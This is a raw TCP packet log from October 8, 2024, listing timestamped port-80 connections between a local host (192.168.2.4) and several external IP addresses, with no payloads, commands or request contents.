                                                                                              Oct 8, 2024 05:29:03.168524027 CEST5001880192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:29:03.179290056 CEST5001880192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:29:03.184134007 CEST805001884.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:03.639091969 CEST805001884.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:03.639158964 CEST5001880192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:29:04.690570116 CEST5001880192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:29:04.695699930 CEST805001884.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:05.711436033 CEST5001980192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:29:05.716660023 CEST805001984.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:05.717257977 CEST5001980192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:29:05.730988979 CEST5001980192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:29:05.735959053 CEST805001984.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:06.194020033 CEST805001984.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:06.194096088 CEST5001980192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:29:07.237571001 CEST5001980192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:29:07.242819071 CEST805001984.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:08.259223938 CEST5002080192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:29:08.264406919 CEST805002084.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:08.264499903 CEST5002080192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:29:08.278836966 CEST5002080192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:29:08.283947945 CEST805002084.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:08.283963919 CEST805002084.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:08.283976078 CEST805002084.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:08.284073114 CEST805002084.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:08.284085989 CEST805002084.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:08.284183979 CEST805002084.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:08.284205914 CEST805002084.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:08.284219027 CEST805002084.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:08.284229994 CEST805002084.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:08.743277073 CEST805002084.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:08.743438005 CEST5002080192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:29:09.784290075 CEST5002080192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:29:09.789239883 CEST805002084.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:10.895493984 CEST5002180192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:29:10.900542974 CEST805002184.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:10.900618076 CEST5002180192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:29:10.911662102 CEST5002180192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:29:10.916537046 CEST805002184.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:11.357343912 CEST805002184.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:11.357373953 CEST805002184.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:11.357409954 CEST805002184.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:11.357428074 CEST805002184.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:11.357460976 CEST805002184.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:11.357477903 CEST805002184.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:11.357563972 CEST805002184.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:11.357564926 CEST5002180192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:29:11.357564926 CEST5002180192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:29:11.357582092 CEST805002184.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:11.357613087 CEST5002180192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:29:11.357618093 CEST805002184.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:11.357640982 CEST5002180192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:29:11.357641935 CEST805002184.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:11.357661009 CEST805002184.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:11.361295938 CEST5002180192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:29:11.363141060 CEST5002180192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:29:11.368232012 CEST805002184.32.84.32192.168.2.4
                                                                                              Oct 8, 2024 05:29:16.405395985 CEST5002280192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:16.410393000 CEST8050022184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:16.410468102 CEST5002280192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:16.422076941 CEST5002280192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:16.426980972 CEST8050022184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:17.031697035 CEST8050022184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:17.031754017 CEST8050022184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:17.031781912 CEST8050022184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:17.032017946 CEST8050022184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:17.032035112 CEST8050022184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:17.032052040 CEST8050022184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:17.032085896 CEST8050022184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:17.032104969 CEST8050022184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:17.032124043 CEST8050022184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:17.032290936 CEST5002280192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:17.033337116 CEST8050022184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:17.033406019 CEST5002280192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:17.037381887 CEST8050022184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:17.037400007 CEST8050022184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:17.037417889 CEST8050022184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:17.037455082 CEST8050022184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:17.037470102 CEST5002280192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:17.037698030 CEST5002280192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:17.043292999 CEST5002280192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:17.925367117 CEST5002280192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:18.943130016 CEST5002380192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:18.948173046 CEST8050023184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:18.948355913 CEST5002380192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:18.957560062 CEST5002380192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:18.962441921 CEST8050023184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:19.606955051 CEST8050023184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:19.606982946 CEST8050023184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:19.607003927 CEST8050023184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:19.607038021 CEST8050023184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:19.607053995 CEST8050023184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:19.607070923 CEST8050023184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:19.607085943 CEST8050023184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:19.607120037 CEST8050023184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:19.607132912 CEST8050023184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:19.607142925 CEST5002380192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:19.607150078 CEST8050023184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:19.607187033 CEST8050023184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:19.607230902 CEST5002380192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:19.607250929 CEST5002380192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:19.612107992 CEST8050023184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:19.612124920 CEST8050023184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:19.612144947 CEST8050023184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:19.617063999 CEST5002380192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:20.471750021 CEST5002380192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:21.493089914 CEST5002480192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:21.498230934 CEST8050024184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:21.498544931 CEST5002480192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:21.508083105 CEST5002480192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:21.512944937 CEST8050024184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:21.513084888 CEST8050024184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:21.513098001 CEST8050024184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:21.513134003 CEST8050024184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:21.513147116 CEST8050024184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:21.513158083 CEST8050024184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:21.513185024 CEST8050024184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:21.513222933 CEST8050024184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:21.513235092 CEST8050024184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:22.228532076 CEST8050024184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:22.228604078 CEST8050024184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:22.228640079 CEST8050024184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:22.228667021 CEST5002480192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:22.228673935 CEST8050024184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:22.228707075 CEST8050024184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:22.228717089 CEST5002480192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:22.228754997 CEST8050024184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:22.228787899 CEST8050024184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:22.228800058 CEST5002480192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:22.228820086 CEST8050024184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:22.228863001 CEST5002480192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:22.228864908 CEST8050024184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:22.228899956 CEST8050024184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:22.228948116 CEST5002480192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:22.233956099 CEST8050024184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:22.233968973 CEST8050024184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:22.234008074 CEST8050024184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:22.234029055 CEST5002480192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:22.234057903 CEST5002480192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:23.018683910 CEST5002480192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:24.037801027 CEST5002580192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:24.042963028 CEST8050025184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:24.043035984 CEST5002580192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:24.050610065 CEST5002580192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:24.055805922 CEST8050025184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:24.715795040 CEST8050025184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:24.715846062 CEST8050025184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:24.715882063 CEST8050025184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:24.715918064 CEST8050025184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:24.715950012 CEST8050025184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:24.715979099 CEST5002580192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:24.716010094 CEST5002580192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:24.716016054 CEST8050025184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:24.716053009 CEST8050025184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:24.716063023 CEST5002580192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:24.716089010 CEST8050025184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:24.716120958 CEST8050025184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:24.716130018 CEST5002580192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:24.716157913 CEST8050025184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:24.716193914 CEST5002580192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:24.721084118 CEST8050025184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:24.721117973 CEST8050025184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:24.721152067 CEST8050025184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:24.721157074 CEST5002580192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:24.721189022 CEST8050025184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:24.721254110 CEST5002580192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:24.723603010 CEST5002580192.168.2.4184.94.215.26
                                                                                              Oct 8, 2024 05:29:24.728590965 CEST8050025184.94.215.26192.168.2.4
                                                                                              Oct 8, 2024 05:29:29.757858992 CEST5002680192.168.2.4104.21.48.76
                                                                                              Oct 8, 2024 05:29:29.763135910 CEST8050026104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:29.767412901 CEST5002680192.168.2.4104.21.48.76
                                                                                              Oct 8, 2024 05:29:29.779403925 CEST5002680192.168.2.4104.21.48.76
                                                                                              Oct 8, 2024 05:29:29.784524918 CEST8050026104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:30.489342928 CEST8050026104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:30.490151882 CEST8050026104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:30.490185976 CEST8050026104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:30.490209103 CEST5002680192.168.2.4104.21.48.76
                                                                                              Oct 8, 2024 05:29:30.490242004 CEST5002680192.168.2.4104.21.48.76
                                                                                              Oct 8, 2024 05:29:31.285728931 CEST5002680192.168.2.4104.21.48.76
                                                                                              Oct 8, 2024 05:29:32.305710077 CEST5002780192.168.2.4104.21.48.76
                                                                                              Oct 8, 2024 05:29:32.310770035 CEST8050027104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:32.310870886 CEST5002780192.168.2.4104.21.48.76
                                                                                              Oct 8, 2024 05:29:32.331582069 CEST5002780192.168.2.4104.21.48.76
                                                                                              Oct 8, 2024 05:29:32.337255001 CEST8050027104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:33.128304005 CEST8050027104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:33.128710032 CEST8050027104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:33.128837109 CEST8050027104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:33.129991055 CEST5002780192.168.2.4104.21.48.76
                                                                                              Oct 8, 2024 05:29:33.846793890 CEST5002780192.168.2.4104.21.48.76
                                                                                              Oct 8, 2024 05:29:34.864839077 CEST5002880192.168.2.4104.21.48.76
                                                                                              Oct 8, 2024 05:29:34.869934082 CEST8050028104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:34.870017052 CEST5002880192.168.2.4104.21.48.76
                                                                                              Oct 8, 2024 05:29:34.880032063 CEST5002880192.168.2.4104.21.48.76
                                                                                              Oct 8, 2024 05:29:34.884970903 CEST8050028104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:34.885031939 CEST8050028104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:34.885061979 CEST8050028104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:34.885111094 CEST8050028104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:34.885137081 CEST8050028104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:34.885216951 CEST8050028104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:34.885260105 CEST8050028104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:34.885308027 CEST8050028104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:34.885531902 CEST8050028104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:35.587308884 CEST8050028104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:35.587558031 CEST8050028104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:35.588407040 CEST5002880192.168.2.4104.21.48.76
                                                                                              Oct 8, 2024 05:29:35.589040995 CEST8050028104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:35.591466904 CEST5002880192.168.2.4104.21.48.76
                                                                                              Oct 8, 2024 05:29:36.393585920 CEST5002880192.168.2.4104.21.48.76
                                                                                              Oct 8, 2024 05:29:37.413013935 CEST5002980192.168.2.4104.21.48.76
                                                                                              Oct 8, 2024 05:29:37.418081045 CEST8050029104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:37.424814939 CEST5002980192.168.2.4104.21.48.76
                                                                                              Oct 8, 2024 05:29:37.429049015 CEST5002980192.168.2.4104.21.48.76
                                                                                              Oct 8, 2024 05:29:37.433964014 CEST8050029104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:38.171293020 CEST8050029104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:38.171873093 CEST8050029104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:38.171978951 CEST5002980192.168.2.4104.21.48.76
                                                                                              Oct 8, 2024 05:29:38.172923088 CEST8050029104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:38.172957897 CEST8050029104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:38.173017025 CEST5002980192.168.2.4104.21.48.76
                                                                                              Oct 8, 2024 05:29:38.178107023 CEST5002980192.168.2.4104.21.48.76
                                                                                              Oct 8, 2024 05:29:38.186311007 CEST8050029104.21.48.76192.168.2.4
                                                                                              Oct 8, 2024 05:29:51.371166945 CEST5003080192.168.2.485.159.66.93
                                                                                              Oct 8, 2024 05:29:51.376271009 CEST805003085.159.66.93192.168.2.4
                                                                                              Oct 8, 2024 05:29:51.379427910 CEST5003080192.168.2.485.159.66.93
                                                                                              Oct 8, 2024 05:29:51.385139942 CEST5003080192.168.2.485.159.66.93
                                                                                              Oct 8, 2024 05:29:51.390276909 CEST805003085.159.66.93192.168.2.4
                                                                                              Oct 8, 2024 05:29:52.893614054 CEST5003080192.168.2.485.159.66.93
                                                                                              Oct 8, 2024 05:29:52.899005890 CEST805003085.159.66.93192.168.2.4
                                                                                              Oct 8, 2024 05:29:52.899089098 CEST5003080192.168.2.485.159.66.93
                                                                                              Oct 8, 2024 05:29:53.912961006 CEST5003180192.168.2.485.159.66.93
                                                                                              Oct 8, 2024 05:29:53.918040991 CEST805003185.159.66.93192.168.2.4
                                                                                              Oct 8, 2024 05:29:53.925175905 CEST5003180192.168.2.485.159.66.93
                                                                                              Oct 8, 2024 05:29:53.931410074 CEST5003180192.168.2.485.159.66.93
                                                                                              Oct 8, 2024 05:29:53.936425924 CEST805003185.159.66.93192.168.2.4
                                                                                              Oct 8, 2024 05:29:55.440520048 CEST5003180192.168.2.485.159.66.93
                                                                                              Oct 8, 2024 05:29:55.445966959 CEST805003185.159.66.93192.168.2.4
                                                                                              Oct 8, 2024 05:29:55.446223974 CEST5003180192.168.2.485.159.66.93
                                                                                              Oct 8, 2024 05:29:56.459973097 CEST5003280192.168.2.485.159.66.93
                                                                                              Oct 8, 2024 05:29:56.465046883 CEST805003285.159.66.93192.168.2.4
                                                                                              Oct 8, 2024 05:29:56.465128899 CEST5003280192.168.2.485.159.66.93
                                                                                              Oct 8, 2024 05:29:56.477219105 CEST5003280192.168.2.485.159.66.93
                                                                                              Oct 8, 2024 05:29:56.482250929 CEST805003285.159.66.93192.168.2.4
                                                                                              Oct 8, 2024 05:29:56.482563019 CEST805003285.159.66.93192.168.2.4
                                                                                              Oct 8, 2024 05:29:56.482573986 CEST805003285.159.66.93192.168.2.4
                                                                                              Oct 8, 2024 05:29:56.482600927 CEST805003285.159.66.93192.168.2.4
                                                                                              Oct 8, 2024 05:29:56.482614040 CEST805003285.159.66.93192.168.2.4
                                                                                              Oct 8, 2024 05:29:56.482633114 CEST805003285.159.66.93192.168.2.4
                                                                                              Oct 8, 2024 05:29:56.482647896 CEST805003285.159.66.93192.168.2.4
                                                                                              Oct 8, 2024 05:29:56.482660055 CEST805003285.159.66.93192.168.2.4
                                                                                              Oct 8, 2024 05:29:56.482675076 CEST805003285.159.66.93192.168.2.4
                                                                                              Oct 8, 2024 05:29:57.995418072 CEST5003280192.168.2.485.159.66.93
                                                                                              Oct 8, 2024 05:29:58.001094103 CEST805003285.159.66.93192.168.2.4
                                                                                              Oct 8, 2024 05:29:58.005085945 CEST5003280192.168.2.485.159.66.93
                                                                                              Oct 8, 2024 05:29:59.006474972 CEST5003380192.168.2.485.159.66.93
                                                                                              Oct 8, 2024 05:29:59.011671066 CEST805003385.159.66.93192.168.2.4
                                                                                              Oct 8, 2024 05:29:59.011786938 CEST5003380192.168.2.485.159.66.93
                                                                                              Oct 8, 2024 05:29:59.019268990 CEST5003380192.168.2.485.159.66.93
                                                                                              Oct 8, 2024 05:29:59.024810076 CEST805003385.159.66.93192.168.2.4
                                                                                              Oct 8, 2024 05:29:59.705615044 CEST805003385.159.66.93192.168.2.4
                                                                                              Oct 8, 2024 05:29:59.705965042 CEST805003385.159.66.93192.168.2.4
                                                                                              Oct 8, 2024 05:29:59.707351923 CEST5003380192.168.2.485.159.66.93
                                                                                              Oct 8, 2024 05:29:59.711369991 CEST5003380192.168.2.485.159.66.93
                                                                                              Oct 8, 2024 05:29:59.716640949 CEST805003385.159.66.93192.168.2.4
                                                                                              Oct 8, 2024 05:30:05.495403051 CEST5003480192.168.2.4185.121.178.197
                                                                                              Oct 8, 2024 05:30:05.500463963 CEST8050034185.121.178.197192.168.2.4
                                                                                              Oct 8, 2024 05:30:05.511406898 CEST5003480192.168.2.4185.121.178.197
                                                                                              Oct 8, 2024 05:30:05.515418053 CEST5003480192.168.2.4185.121.178.197
                                                                                              Oct 8, 2024 05:30:05.520522118 CEST8050034185.121.178.197192.168.2.4
                                                                                              Oct 8, 2024 05:30:06.494811058 CEST8050034185.121.178.197192.168.2.4
                                                                                              Oct 8, 2024 05:30:06.494828939 CEST8050034185.121.178.197192.168.2.4
                                                                                              Oct 8, 2024 05:30:06.494883060 CEST5003480192.168.2.4185.121.178.197
                                                                                              Oct 8, 2024 05:30:07.018486023 CEST5003480192.168.2.4185.121.178.197
                                                                                              Oct 8, 2024 05:30:08.038932085 CEST5003580192.168.2.4185.121.178.197
                                                                                              Oct 8, 2024 05:30:08.043905020 CEST8050035185.121.178.197192.168.2.4
                                                                                              Oct 8, 2024 05:30:08.050906897 CEST5003580192.168.2.4185.121.178.197
                                                                                              Oct 8, 2024 05:30:08.058909893 CEST5003580192.168.2.4185.121.178.197
                                                                                              Oct 8, 2024 05:30:08.063924074 CEST8050035185.121.178.197192.168.2.4
                                                                                              Oct 8, 2024 05:30:08.991693020 CEST8050035185.121.178.197192.168.2.4
                                                                                              Oct 8, 2024 05:30:08.991923094 CEST8050035185.121.178.197192.168.2.4
                                                                                              Oct 8, 2024 05:30:08.991982937 CEST5003580192.168.2.4185.121.178.197
                                                                                              Oct 8, 2024 05:30:09.566951990 CEST5003580192.168.2.4185.121.178.197
                                                                                              Oct 8, 2024 05:30:10.583726883 CEST5003680192.168.2.4185.121.178.197
                                                                                              Oct 8, 2024 05:30:10.589143991 CEST8050036185.121.178.197192.168.2.4
                                                                                              Oct 8, 2024 05:30:10.589217901 CEST5003680192.168.2.4185.121.178.197
                                                                                              Oct 8, 2024 05:30:10.600647926 CEST5003680192.168.2.4185.121.178.197
                                                                                              Oct 8, 2024 05:30:10.605633020 CEST8050036185.121.178.197192.168.2.4
                                                                                              Oct 8, 2024 05:30:10.605655909 CEST8050036185.121.178.197192.168.2.4
                                                                                              Oct 8, 2024 05:30:10.605664015 CEST8050036185.121.178.197192.168.2.4
                                                                                              Oct 8, 2024 05:30:10.605669975 CEST8050036185.121.178.197192.168.2.4
                                                                                              Oct 8, 2024 05:30:10.605675936 CEST8050036185.121.178.197192.168.2.4
                                                                                              Oct 8, 2024 05:30:10.605743885 CEST8050036185.121.178.197192.168.2.4
                                                                                              Oct 8, 2024 05:30:10.605756998 CEST8050036185.121.178.197192.168.2.4
                                                                                              Oct 8, 2024 05:30:10.605781078 CEST8050036185.121.178.197192.168.2.4
                                                                                              Oct 8, 2024 05:30:10.605823994 CEST8050036185.121.178.197192.168.2.4
                                                                                              Oct 8, 2024 05:30:11.552409887 CEST8050036185.121.178.197192.168.2.4
                                                                                              Oct 8, 2024 05:30:11.552824974 CEST8050036185.121.178.197192.168.2.4
                                                                                              Oct 8, 2024 05:30:11.559452057 CEST5003680192.168.2.4185.121.178.197
                                                                                              Oct 8, 2024 05:30:12.115397930 CEST5003680192.168.2.4185.121.178.197
                                                                                              Oct 8, 2024 05:30:13.130707026 CEST5003780192.168.2.4185.121.178.197
                                                                                              Oct 8, 2024 05:30:13.135849953 CEST8050037185.121.178.197192.168.2.4
                                                                                              Oct 8, 2024 05:30:13.137644053 CEST5003780192.168.2.4185.121.178.197
                                                                                              Oct 8, 2024 05:30:13.147437096 CEST5003780192.168.2.4185.121.178.197
                                                                                              Oct 8, 2024 05:30:13.152333021 CEST8050037185.121.178.197192.168.2.4
                                                                                              Oct 8, 2024 05:30:14.034758091 CEST8050037185.121.178.197192.168.2.4
                                                                                              Oct 8, 2024 05:30:14.034791946 CEST8050037185.121.178.197192.168.2.4
                                                                                              Oct 8, 2024 05:30:14.037880898 CEST5003780192.168.2.4185.121.178.197
                                                                                              Oct 8, 2024 05:30:14.037880898 CEST5003780192.168.2.4185.121.178.197
                                                                                              Oct 8, 2024 05:30:14.042895079 CEST8050037185.121.178.197192.168.2.4
                                                                                              Oct 8, 2024 05:30:19.066688061 CEST5003880192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:19.071465015 CEST805003868.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:19.071535110 CEST5003880192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:19.079180956 CEST5003880192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:19.084012032 CEST805003868.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:19.656265974 CEST805003868.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:19.656378031 CEST805003868.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:19.656382084 CEST805003868.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:19.656387091 CEST805003868.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:19.656390905 CEST805003868.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:19.656400919 CEST805003868.65.122.222192.168.2.4
                                                                                              Oct 8, 2024 05:30:19.657799959 CEST5003880192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:19.662152052 CEST5003880192.168.2.468.65.122.222
                                                                                              Oct 8, 2024 05:30:20.580962896 CEST5003880192.168.2.468.65.122.222
